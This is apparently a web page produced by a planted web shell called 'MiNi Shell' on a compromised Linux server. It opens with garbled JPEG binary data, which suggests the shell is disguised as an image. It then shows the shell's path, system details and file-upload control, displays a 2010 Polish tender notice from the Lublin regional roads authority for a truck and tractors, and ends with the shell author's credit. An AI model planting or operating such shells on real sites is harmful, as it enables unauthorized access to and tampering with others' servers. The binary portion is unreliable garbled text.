JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101116/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101116/369834-N-2010.html

<p class="kh_header"><b>Lublin: - Zadanie Nr I - dostawa 1 szt. fabrycznie nowego samochodu ciężarowego 
o dopuszczalnej masie całkowitej do 3,5 tony
- Zadanie Nr II -  dostawa 2 szt.  fabrycznie nowych ciągników rolniczych wraz 
z osprzętem oraz szkolenie z zakresu  ich obsługi</b><br>
<b>Numer ogłoszenia: 369834 - 2010; data zamieszczenia: 16.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Wojewódzkich , ul. Turystyczna 7A, 20-207 Lublin, woj. lubelskie, tel. 081 7495300, faks 081 7495341.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdw.lublin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> - Zadanie Nr I - dostawa 1 szt. fabrycznie nowego samochodu ciężarowego 
o dopuszczalnej masie całkowitej do 3,5 tony
- Zadanie Nr II -  dostawa 2 szt.  fabrycznie nowych ciągników rolniczych wraz 
z osprzętem oraz szkolenie z zakresu  ich obsługi.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:
Zadanie Nr I - dostawa 1 szt. fabrycznie nowego samochodu ciężarowego 
o dopuszczalnej masie całkowitej do 3,5 tony
Zadanie Nr II -  dostawa 2 szt.  fabrycznie nowych ciągników rolniczych wraz 
z osprzętem oraz szkolenie z zakresu  ich obsługi

Wartość zamówienia (Zadanie Nr I+ Zadanie Nr II) - 327868,85 zł netto.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 34.13.10.00-4, 16.70.00.00-2, 42.90.00.00-5, 16.31.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Warunkiem uczestnictwa w przetargu jest wniesienie wadium w wysokości: 
- Zadanie Nr I - 700,00 zł. (słownie złotych; siedemset 00/100)
- Zadanie nr II - 2 700,00 zł (słownie złotych: dwa tysiące siedemset 00/100) 
W przypadku oferty na wykonanie więcej niż jednego zadania Wykonawca winien wnieść zsumowaną kwotę w wysokości 3 400,00 zł., słownie złotych: trzy tysiące czterysta 00/100
2. Wadium może być wnoszone w formach określonych w art. 45, ust. 6 ustawy Prawo zamówień publicznych.
3. Wadium wnoszone w formie pieniężnej należy wpłacić przelewem na konto ZDW 
w Lublinie w Kredyt Banku S.A. O/Lublin nr 89 1500 1520 1215 2004 1596 0000.
4. W ofercie należy złożyć dokument potwierdzający wniesienie wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku posiadania wiedzy i doświadczenia Wykonawca  winien wykonać w ciągu ostatnich 3 lat przed wszczęciem postępowania o udzielenie zamówienia, 
a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie:  na Zadanie I -  dostawę min. 1 szt. samochodu ciężarowego o masie całkowitej do 3,5 tony, na Zadanie II -  dostawę min. 1 szt. ciągnika rolniczego.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">opis urządzeń technicznych, instrukcję obsługi oraz środków stosowanych przez wykonawcę dostaw lub usług oraz opis zaplecza naukowo-badawczego wykonawcy, w celu potwierdzenia zapewnienia odpowiedniej jakości realizowanego zamówienia</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)	Dowód wniesienia wadium.
b)	Ofertę przetargową (z ceną netto i z podatkiem VAT) .
c)	Wykaz części zamówienia, których wykonanie Wykonawca  powierzy podwykonawcy 
d)	W przypadku wspólnego ubiegania się Wykonawców o udzielenie zamówienia, do oferty należy załączyć dokument (np. odpowiednią umowę) ustanawiający pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego zgodnie z art. 23 ust. 1 i 2 ustawy Prawo zamówień publicznych.
e)	W przypadku podpisania oferty i innych dokumentów przez osobę/osoby, które nie są wymienione w odpisie z właściwego rejestru do oferty należy załączyć dokument potwierdzający prawo do reprezentowania podmiotu przez osobę/osoby podpisujące ofertę</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ebip.lublin.pl/zdw<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację Istotnych Warunków Zamówienia można odebrać w siedzibie Zamawiającego, lok. 203, lub pocztą elektroniczną po wcześniejszym przesłaniu zamówienia na adres:dzp@zdw.lublin.pl..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.11.2010 godzina 08:00, miejsce: Zarząd Dróg Wojewódzkich w Lublinie, ul. Turystyczna 7a, pok. 107. Otwarcie ofert nastąpi w dniu 24.11.2010 o godz.08:30 w pok. 208...</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Oświadczenia, wnioski, zawiadomienia oraz informacje Zamawiający i Wykonawcy przekazują za pomocą faksu nr (81) 749-53-41; (81) 749-53-77 lub drogą elektroniczną na adres e-mail: dzp@zdw.lublin.pl. 
Jeżeli Zamawiający lub Wykonawca przekazują oświadczenia, wnioski, zawiadomienia oraz informacje faksem lub drogą elektroniczną, każda ze stron na żądanie drugiej niezwłocznie potwierdza fakt ich otrzymania.

Osoby uprawnione do porozumiewania się z wykonawcami: 
1.   W zakresie przedmiotu zamówienia - Wydział Administracji i Zaplecza Technicznego, Andrzej Sieńko, tel. (81) 749-53-10, 749-53-09, 
2.   W sprawach formalno-prawnych związanych z postępowaniem o udzielenie zamówienia 
i zawarciem umowy - Wydział Umów, Sławomir Szepietowski, tel. (81) 749-53-44;
749-53-29.
UWAGA: 
Wykonawcy, którzy uzyskają niniejszą specyfikację ze strony internetowej zamawiającego lub w inny sposób i zamierzają ubiegać się o udzielenie zamówienia, proszeni są 
o przesłanie krótkiej informacji faksem (81) 749-53-77 lub pocztą elektroniczną na adres dzp@zdw.lublin.pl zawierającej podstawowe dane firmy (nazwa, adres, numer tel. i faksu, adres poczty elektronicznej). Wykonawcy, którzy zgłoszą w ten sposób zamiar ubiegania się 
o udzielenie zamówienia będą przez Zamawiającego indywidualnie (bezpośrednio) zawiadamiani o np.: zapytaniach, wyjaśnieniach i zmianach dotyczących specyfikacji istotnych warunków zamówienia, zwołaniu przez Zamawiającego zebrania wszystkich wykonawców, przedłużeniu terminu składania ofert..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie Nr I - dostawa 1 szt. fabrycznie nowego samochodu ciężarowego 
o dopuszczalnej masie całkowitej do 3,5 tony.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie Nr I - dostawa 1 szt. fabrycznie nowego samochodu ciężarowego 
o dopuszczalnej masie całkowitej do 3,5 tony.

1)	Warunki ogólne
1.	Ilość pojazdów - 1 szt.
2.	Pojazd musi być fabrycznie nowy ( rok produkcji 2010 )
3.	Typ pojazdu: z podwójną kabiną( 7 osobowa) i skrzynią ładunkową
4.	Pojazd musi posiadać homologację na pojazd ciężarowy
5.	Pojazd musi spełniać wymogi normy ochrony środowiska min. EURO 4
6.	Pojazd musi posiadać dokumenty niezbędne do zarejestrowania bez dodatkowych czynności, oraz instrukcję w języku polskim
7.	Pojazd musi posiadać kartę pojazdu
8.	Okres gwarancyjny  min.24 miesiące od daty bezusterkowego protokolarnego odbioru bez limitu kilometrów na samochód
9.	Serwis pojazdu musi się znajdować w odległości nie większej jak 50 km od siedziby Zamawiającego

2)	Warunki techniczne
1.	Silnik Diesla z wtryskiem bezpośrednim z turbodoładowaniem
2.	Pojemność skokowa silnika 2000-2500 cm3
3.	Moc silnika 100-120 KM
4.	Skrzynia 6-biegowa mechaniczna
5.	Kolor nadwozia czerwony (dopuszczalny jest inny  z wyjątkiem białego)
6.	Liczba drzwi- 4 szt
7.	Lusterka boczne  na wydłużonych ramionach
8.	Szyby w przednich drzwiach i lusterka zewnętrzne elektrycznie regulowane
9.	Nawiewy boczne oraz na konsoli centralnej regulowane

10.	Klimatyzacja regulowana ręcznie 
11.	Kołpaki na koła
12.	ABS
13.	Poduszka powietrzna kierowcy
14.	Pasy bezpieczeństwa przednie i tylne
15.	Zagłówki z przodu i tyłu pełne
16.	Wspomaganie układu kierowniczego
17.	Centralny zamek drzwi zdalnie sterowany falami radiowymi
18.	Skrzynia ładunkowa z aluminiowymi burtami
19.	Wymiary skrzyni ładunkowej: długość od 2900 mm do 3500 mm, wysokość burt 350-400mm
20.	Zespolona lampa ostrzegawcza ksenonowa koloru pomarańczowego z napisem SŁUŻBA DROGOWA zamontowana na dachu samochodu
21.	Napisy boczne ( Służba Drogowa i adres RDW). Dokładna nazwa i adres siedziby RDW zostanie podana Wykonawcy, którego oferta zostanie wybrana za najkorzystniejszą, przed podpisaniem umowy
22. Ładowność max. 1400 kg.
22.	Dopuszczalna masa całkowita pojazdu do 3500 kg
23.	Liczba miejsc włącznie z kierowcą 7 szt.( podwójna kabina)
24.	Osłona z tyłu kabiny, która w przypadku nagłego hamowania pozwala na zatrzymanie przewożonych materiałów zabezpieczając w ten sposób pasażerów siedzących w kabinie
25.	Radioodtwarzacz
26.	Autoalarm
27.	System blokady zapłonu z kodem w kluczyku
28.	Dodatkowy komplet kół (felgi stalowe) z oponami zimowymi
29.	Zaczep holowniczy
30.	Hak holowniczy
31.	Pokrowce na fotele łatwozmywalne
32.	Dywaniki podłogowe
33.	Miejsce dostawy: Lublin, ul. Turystyczna 7a

Wartość Zadania Nr I -  65 573 ,77 zł netto.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.13.10.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.12.2010.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie Nr II - dostawa 2 szt.  fabrycznie nowych ciągników rolniczych wraz 
z osprzętem oraz szkolenie z zakresu  ich obsługi.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie Nr II - dostawa 2 szt.  fabrycznie nowych ciągników rolniczych wraz 
z osprzętem oraz szkolenie z zakresu  ich obsługi
W ramach Zadania Nr II dostarczyć należy:
- ciągnik rolniczy - 2 szt.
- uniwersalne hydrauliczne ramię robocze - 2szt.
- głowicę do koszenia traw i krzewów - 2 szt.

2.  Wymagane parametry techniczne ciągnika:

CPV: 16700000-2
 - rok produkcji -2010
 - pełne wyposażenie wymagane podczas poruszania się po drogach publicznych
 - fabryczny zestaw narzędzi
 - silnik spalinowy czterosuwowy, wysokoprężny o mocy min. 75 KM
 - skrzynia biegów synchronizowana wyposażona w biegi pełzające min 10P X 2R
 - hydraulika zewnętrzna - min 2 pary szybkozłączy
 - wydajność pompy hydraulicznej min. 45l/min.
 - WOM tylny- min.540 obr/min. Zależny i niezależny
 - trzypunktowy TUZ tylny - udźwig min. 3500 kg.
 - obciążniki przednie min. 360 kg.
 - napęd na 4 koła - 4x4 (4WD)
 - niezależne hamulce tarczowe dla osi kół tylnych
 - ogumienie , min. przód 360/70R24, tył18,4/R34
 - układ pneumatyki dla sterowania hamulcami przyczep
 - regulowany zaczep transportowy do przyczep ze sworzniem, oraz zaczep rolniczy
  - kabina ogrzewana ,wentylowana (dopuszczalna jest   klimatyzacja)
  - dodatkowe oświetlenie przednie min. 2 lampy dachowe
  - lampa ostrzegawcza koloru pomarańczowego na dachu kabiny
  -udokumentowanie danych fabrycznych (folder producenta lub świadectwo  homologacji)   
-  okres gwarancyjny  min.12 miesięcy od daty bezusterkowego protokolarnego odbioru bez limitu motogodzin
- napisy boczne ( Służba Drogowa i adres RDW). Dokładna nazwa i adres siedziby RDW zostanie podana Wykonawcy, którego oferta zostanie wybrana za najkorzystniejszą, przed podpisaniem umowy
-  Wykonawca zabezpieczy serwis gwarancyjny w ciągu 48 godzin od zgłoszenia w miejscu przebywania ciągnika

          
  3. Wymagane parametry techniczne ramienia roboczego:
           
  CPV: 42900000-5
  - rok produkcji 2010
- zasięg roboczy - min 5,5 m.
- mocowanie na TUZ tylnym podnośnika
- stabilizacja ramienia w systemie Cramer
- niezależny od ciągnika układ hydrauliczny
 - dwa kierunki obrotu wału roboczego
 - sterowanie funkcjami ramienia z kabiny kierowcy
 - moc na hydromotorze - min. 45 KM
 - płynna regulacja głowicy w stosunku do terenu
- hydrauliczno - gazowy bezpiecznik podnoszenia i opuszczania ramienia
- hydrauliczno - gazowy bezpiecznik najazdowy ramienia
- obrót ramienia o 110o wraz z zabezpieczeniem
- kompatybilność głowic roboczych w sposób umożliwiający natychmiastową ich pracę z oferowanym ramieniem
- kute elementy połączenia ramion wysięgnika
- znak bezpieczeństwa CE
- okres gwarancyjny  min.12 miesięcy od daty bezusterkowego protokolarnego odbioru
-  Wykonawca zabezpieczy serwis  w ciągu 48 godzin od zgłoszenia w miejscu przebywania urządzenia


4. Wymagane parametry techniczne głowicy do koszenia traw i krzaków:

CPV: 16310000-1
- rok produkcji 2010
- moc na wale tnącym min. 35 KM.
 - szerokość głowicy koszącej min. 120 cm.
- noże w kształcie litery  Y  tnące i rozdrabniające, umożliwiające likwidację zakrzaczeń 
o średnicy min. 4 cm.
- montaż na dostarczonym ramieniu roboczym w sposób umożliwiający transport oraz natychmiastową pracę
- - płynna regulacja głowicy koszącej w odniesieniu do terenu
- regulowany kąt pracy w zakresie +/- 180o
- znak bezpieczeństwa CE
- okres gwarancyjny  min.12 miesięcy od daty bezusterkowego protokolarnego odbioru
-  Wykonawca zabezpieczy serwis gwarancyjny w ciągu 48 godzin od zgłoszenia w miejscu przebywania urządzenia

Ciągniki rolnicze wraz z osprzętem należy dostarczyć na ul. Turystyczną 7A, Lublin.

5. Szkolenie :
W  ramach Zadania Nr II  Wykonawca przeprowadzi szkolenia z zakresu obsługi  i eksploatacji kosiarek mechanicznych dla osób WYTYPOWANYCH przez  Zamawiającego, a po zakończeniu szkolenia wykonawca wystawi uczestnikom stosowne imienne zaświadczenia o odbyciu przeszkolenia. Miejsce i  termin szkolenia Wykonawca uzgodni z Zamawiającym.

Wartość Zadania II - 262 295,08 zł netto.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 16.70.00.00-2, 42.90.00.00-5, 16.31.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 22.12.2010.</p></li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com